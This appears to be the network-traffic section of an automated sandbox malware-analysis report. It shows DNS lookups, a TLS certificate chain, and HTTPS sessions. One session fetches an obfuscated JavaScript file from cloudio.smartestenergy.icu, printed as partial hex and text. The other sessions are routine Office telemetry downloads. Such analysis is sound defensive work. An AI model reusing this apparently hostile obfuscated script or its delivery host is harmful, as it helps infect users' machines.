Nov 26, 2024 13:43:35.509382963 CET	53	62517	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:37.243433952 CET	57607	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:37.243577003 CET	65316	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:37.387511969 CET	53	65316	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:37.387675047 CET	53	57607	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:37.442323923 CET	53	54567	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:38.589147091 CET	53	57209	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:38.600550890 CET	53	62795	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:44.724072933 CET	53	51457	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:59.107398033 CET	55137	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:59.107994080 CET	51455	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:59.216758966 CET	58065	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:59.216902018 CET	56750	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:59.358792067 CET	53	51455	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:59.362921000 CET	53	55137	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:59.959237099 CET	53	56750	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:59.959703922 CET	53	58065	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:01.257936954 CET	50976	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:01.258074999 CET	61160	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:01.403374910 CET	53	61160	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:01.405675888 CET	53	50976	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:03.479995966 CET	64177	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:03.480199099 CET	50794	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:03.536343098 CET	53	57035	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:03.696676970 CET	53	64177	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:03.704221010 CET	53	50794	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:06.095087051 CET	62735	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:06.095256090 CET	60205	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:06.237185001 CET	53	60205	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:06.237535954 CET	53	62735	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:09.683063984 CET	53351	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:09.684711933 CET	63103	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:09.821757078 CET	53	53351	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:09.824367046 CET	53	63103	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:12.297059059 CET	54600	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:12.297394991 CET	53631	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:12.317230940 CET	63484	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:12.317784071 CET	56248	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:12.456465006 CET	53	63484	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:12.457787037 CET	53	56248	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:15.873224974 CET	138	138	192.168.2.7	192.168.2.255
Nov 26, 2024 13:44:23.712990046 CET	53	61243	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:26.289973021 CET	53	53751	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:26.634021997 CET	53	63147	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:28.530766964 CET	61862	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:28.530903101 CET	50960	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:44:28.670824051 CET	53	61862	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:28.670937061 CET	53	50960	1.1.1.1	192.168.2.7
Nov 26, 2024 13:44:53.554225922 CET	53	61376	1.1.1.1	192.168.2.7
Nov 26, 2024 13:45:14.500745058 CET	60774	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:45:14.500894070 CET	53010	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:45:19.477817059 CET	54816	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:45:19.477966070 CET	64095	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:45:19.619249105 CET	53	64095	1.1.1.1	192.168.2.7
Nov 26, 2024 13:45:19.702833891 CET	53	54816	1.1.1.1	192.168.2.7
Nov 26, 2024 13:45:39.380836964 CET	53	60178	1.1.1.1	192.168.2.7
Nov 26, 2024 13:46:14.826267004 CET	56817	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:46:14.826426029 CET	55299	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:46:24.010437965 CET	56164	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:46:24.010598898 CET	51775	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:46:24.152769089 CET	53	51775	1.1.1.1	192.168.2.7
Nov 26, 2024 13:46:24.513191938 CET	53	56164	1.1.1.1	192.168.2.7

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 26, 2024 13:45:10.491318941 CET	13.107.246.63	443	192.168.2.7	50007	CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013	Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0	28a2c9bd18a11de089ef85a160da29e4
					CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jun 08 02:00:00 CEST 2023	Wed Aug 26 01:59:59 CEST 2026
					CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 01 14:00:00 CEST 2013	Fri Jan 15 13:00:00 CET 2038

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:26 UTC	518	OUT	GET /hustines/luketurg/runever.js HTTP/1.1 Host: cloudio.smartestenergy.icu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:27 UTC	429	IN	HTTP/1.1 200 OK etag: "1b7a1-673ac020-13cf93;;;" last-modified: Mon, 18 Nov 2024 04:18:40 GMT content-type: text/javascript content-length: 112545 accept-ranges: bytes date: Tue, 26 Nov 2024 12:43:26 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 63 33 35 64 30 2c 5f 30 78 65 65 32 30 32 33 29 7b 63 6f 6e 73 74 20 5f 30 78 33 31 65 37 63 39 3d 5f 30 78 32 34 64 35 2c 5f 30 78 34 30 66 31 30 61 3d 5f 30 78 33 63 33 35 64 30 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 34 36 62 34 34 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 65 37 63 39 28 30 78 32 35 66 29 29 2f 28 2d 30 78 32 62 39 2b 2d 30 78 31 30 33 2a 2d 30 78 37 2b 30 78 34 35 62 2a 2d 30 78 31 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 65 37 63 39 28 30 78 32 66 36 29 29 2f 28 30 78 32 2a 30 78 31 33 33 34 2b 30 78 31 32 38 31 2b 2d 30 78 33 38 65 37 2a 30 78 31 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 65 37 63 39 28 30 78 32 65 37 29 Data Ascii: (function(_0x3c35d0,_0xee2023){const _0x31e7c9=_0x24d5,_0x40f10a=_0x3c35d0();while(!![]){try{const _0x546b44=parseInt(_0x31e7c9(0x25f))/(-0x2b9+-0x103-0x7+0x45b-0x1)+-parseInt(_0x31e7c9(0x2f6))/(0x20x1334+0x1281+-0x38e70x1)*(-parseInt(_0x31e7c9(0x2e7)
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 35 36 64 64 66 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 39 30 39 38 35 2a 5f 30 78 35 36 64 64 66 31 3b 7d 2c 27 4e 62 64 6a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 39 33 64 31 32 2c 5f 30 78 35 35 38 34 31 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 39 33 64 31 32 28 5f 30 78 35 35 38 34 31 33 29 3b 7d 2c 27 6e 67 73 50 48 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 64 65 33 64 36 36 2c 5f 30 78 35 32 63 62 64 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 64 65 33 64 36 36 2b 5f 30 78 35 32 63 62 64 35 3b 7d 2c 27 73 4f 49 6e 71 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 38 37 39 63 2c 5f 30 78 32 62 64 35 31 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 32 38 37 39 63 28 5f 30 78 32 62 64 35 31 31 29 3b 7d 2c 27 54 78 78 6f 58 27 3a 66 75 6e 63 74 69 6f Data Ascii: 56ddf1){return _0x190985*_0x56ddf1;},'Nbdjp':function(_0x293d12,_0x558413){return _0x293d12(_0x558413);},'ngsPH':function(_0xde3d66,_0x52cbd5){return _0xde3d66+_0x52cbd5;},'sOInq':function(_0x12879c,_0x2bd511){return _0x12879c(_0x2bd511);},'TxxoX':functio
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 29 2c 2d 28 30 78 31 2a 30 78 31 65 66 37 2b 30 78 62 2a 2d 30 78 61 37 2b 2d 30 78 31 37 63 39 29 29 2c 2d 28 2d 30 78 31 65 33 34 2b 30 78 34 66 35 2b 2d 30 78 31 33 2a 2d 30 78 31 63 37 29 29 2c 5f 30 78 34 61 32 33 62 36 5b 5f 30 78 61 38 63 63 32 35 28 30 78 34 38 32 29 5d 28 30 78 31 2a 2d 30 78 62 66 33 2b 2d 30 78 32 2a 30 78 33 63 37 2b 30 78 31 33 38 33 2c 30 78 65 30 35 2b 2d 30 78 31 35 62 2a 2d 30 78 32 2b 2d 30 78 34 64 61 29 29 2c 5f 30 78 34 61 32 33 62 36 5b 5f 30 78 61 38 63 63 32 35 28 30 78 32 66 63 29 5d 28 5f 30 78 34 61 32 33 62 36 5b 5f 30 78 61 38 63 63 32 35 28 30 78 32 37 37 29 5d 28 2d 28 2d 30 78 32 32 2a 2d 30 78 32 39 2b 30 78 64 39 61 2a 2d 30 78 33 2b 30 78 31 2a 30 78 33 38 36 37 29 2c 5f 30 78 34 61 32 33 62 36 5b 5f 30 Data Ascii: ),-(0x10x1ef7+0xb-0xa7+-0x17c9)),-(-0x1e34+0x4f5+-0x13-0x1c7)),_0x4a23b6[_0xa8cc25(0x482)](0x1-0xbf3+-0x20x3c7+0x1383,0xe05+-0x15b-0x2+-0x4da)),_0x4a23b6[_0xa8cc25(0x2fc)](_0x4a23b6[_0xa8cc25(0x277)](-(-0x22-0x29+0xd9a-0x3+0x1*0x3867),_0x4a23b6[_0
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 62 38 29 2c 27 67 43 62 77 64 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 34 64 29 2c 27 47 6e 45 6f 47 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 37 36 29 2c 27 51 62 47 4d 4a 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 32 36 33 29 2c 27 74 71 78 56 43 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 33 38 29 2c 27 51 6a 48 64 5a 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 32 37 39 29 2c 27 47 52 6f 74 63 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 63 32 29 2c 27 4b 71 75 5a 77 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 38 30 29 2c 27 69 51 69 67 54 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 33 38 61 29 2c 27 64 67 72 6e 55 27 3a 5f 30 78 33 33 64 39 62 65 28 30 78 34 37 30 29 2c 27 63 41 54 4d 62 27 3a 5f 30 78 33 Data Ascii: :_0x33d9be(0x4b8),'gCbwd':_0x33d9be(0x34d),'GnEoG':_0x33d9be(0x376),'QbGMJ':_0x33d9be(0x263),'tqxVC':_0x33d9be(0x438),'QjHdZ':_0x33d9be(0x279),'GRotc':_0x33d9be(0x4c2),'KquZw':_0x33d9be(0x380),'iQigT':_0x33d9be(0x38a),'dgrnU':_0x33d9be(0x470),'cATMb':_0x3
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 6d 46 27 2c 27 6c 67 62 42 54 27 2c 27 63 75 53 77 69 27 2c 27 4a 44 66 57 63 27 2c 27 69 7a 51 72 4c 27 2c 27 6e 6c 69 6e 65 2f 66 6c 2f 27 2c 27 62 4e 76 6b 75 27 2c 27 31 30 6f 7a 50 68 77 52 27 2c 27 4b 54 6e 45 78 27 2c 27 79 64 6f 64 50 27 2c 27 33 35 36 37 39 37 38 54 70 54 27 2c 27 4f 6f 57 6a 47 27 2c 27 55 44 5a 78 67 27 2c 27 63 46 7a 70 57 27 2c 27 51 6a 66 42 78 27 2c 27 75 48 43 6b 74 27 2c 27 6d 74 51 4d 75 27 2c 27 78 41 61 55 4f 27 2c 27 48 46 58 57 55 27 2c 27 77 44 58 76 53 27 2c 27 62 6f 72 64 65 72 27 2c 27 35 34 36 35 64 4f 6e 78 6d 73 27 2c 27 4e 74 4e 6d 74 27 2c 27 64 61 74 61 5d 27 2c 27 56 66 44 75 6a 27 2c 27 72 59 68 6f 4a 27 2c 27 4c 41 69 6d 45 27 2c 27 6a 76 67 42 54 27 2c 27 57 53 6c 65 67 27 2c 27 61 59 53 55 71 27 2c 27 Data Ascii: mF','lgbBT','cuSwi','JDfWc','izQrL','nline/fl/','bNvku','10ozPhwR','KTnEx','ydodP','3567978TpT','OoWjG','UDZxg','cFzpW','QjfBx','uHCkt','mtQMu','xAaUO','HFXWU','wDXvS','border','5465dOnxms','NtNmt','data]','VfDuj','rYhoJ','LAimE','jvgBT','WSleg','aYSUq','
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 38 39 2b 30 78 33 65 30 2a 2d 30 78 32 2b 28 2d 30 78 64 65 31 2b 2d 30 78 34 2a 2d 30 78 37 30 36 2b 2d 30 78 65 33 34 29 2a 28 30 78 31 32 33 30 2b 30 78 34 64 30 2b 2d 30 78 31 32 39 33 29 2b 2d 28 30 78 34 31 66 2a 30 78 31 2b 30 78 64 2a 30 78 32 61 66 2b 2d 30 78 31 34 39 35 29 29 5d 3d 5f 30 78 66 62 36 38 32 66 28 2d 28 30 78 63 63 34 2b 30 78 32 34 37 2a 30 78 64 2b 2d 30 78 31 65 64 2a 30 78 31 36 29 2a 2d 28 30 78 32 32 62 31 2b 2d 30 78 34 36 39 2b 30 78 31 2a 2d 30 78 66 30 37 29 2b 28 30 78 39 37 2a 30 78 31 66 2b 30 78 32 34 33 30 2b 2d 30 78 33 36 37 37 29 2a 28 30 78 31 64 64 30 2b 30 78 32 33 61 31 2b 30 78 35 2a 2d 30 78 39 34 33 29 2b 2d 28 2d 30 78 33 62 66 2a 2d 30 78 31 34 2b 2d 30 78 35 36 61 35 2b 30 78 34 30 36 38 29 29 2c 69 66 Data Ascii: 89+0x3e0-0x2+(-0xde1+-0x4-0x706+-0xe34)(0x1230+0x4d0+-0x1293)+-(0x41f0x1+0xd0x2af+-0x1495))]=_0xfb682f(-(0xcc4+0x2470xd+-0x1ed0x16)-(0x22b1+-0x469+0x1-0xf07)+(0x970x1f+0x2430+-0x3677)(0x1dd0+0x23a1+0x5-0x943)+-(-0x3bf*-0x14+-0x56a5+0x4068)),if
2024-11-26 12:43:27 UTC	14241	IN	Data Raw: 2c 2d 30 78 31 2a 30 78 31 33 62 65 2b 30 78 65 39 63 2b 30 78 35 66 39 29 2c 5f 30 78 35 36 37 31 64 36 5b 5f 30 78 34 34 36 31 64 61 28 30 78 33 33 35 29 5d 28 30 78 31 30 36 2a 30 78 31 31 2b 30 78 34 64 33 2a 2d 30 78 32 2b 2d 30 78 37 38 63 2c 30 78 32 36 65 31 2b 2d 30 78 33 61 31 2a 30 78 33 2b 2d 30 78 31 62 34 37 29 29 29 29 5d 28 29 3b 7d 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 66 62 36 38 32 66 28 2d 30 78 31 2a 2d 30 78 31 31 35 33 2b 30 78 32 2a 30 78 38 62 37 2b 2d 30 78 31 65 65 61 2b 2d 28 30 78 39 31 2a 2d 30 78 33 31 2b 2d 30 78 34 37 2a 30 78 38 39 2b 2d 30 78 32 38 30 64 2a 2d 30 78 32 29 2b 28 2d 30 78 31 36 36 2a 2d 30 78 31 30 2b 2d 30 78 31 61 65 62 2b 30 78 34 2a 30 78 33 66 31 29 29 2b 5f 30 78 66 62 36 38 32 66 28 2d 28 30 78 Data Ascii: ,-0x10x13be+0xe9c+0x5f9),_0x5671d6[_0x4461da(0x335)](0x1060x11+0x4d3-0x2+-0x78c,0x26e1+-0x3a10x3+-0x1b47))))]();}),document[_0xfb682f(-0x1-0x1153+0x20x8b7+-0x1eea+-(0x91-0x31+-0x470x89+-0x280d-0x2)+(-0x166-0x10+-0x1aeb+0x4*0x3f1))+_0xfb682f(-(0x

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:27 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:27 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:27 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Mon, 25 Nov 2024 13:17:46 GMT ETag: "0x8DD0D538D5EA1E0" x-ms-request-id: f5f75198-101e-00a2-8091-3f9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124327Z-174f7845968cdxdrhC1EWRg0en0000000vg0000000001aa6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:27 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-26 12:43:27 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-26 12:43:28 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
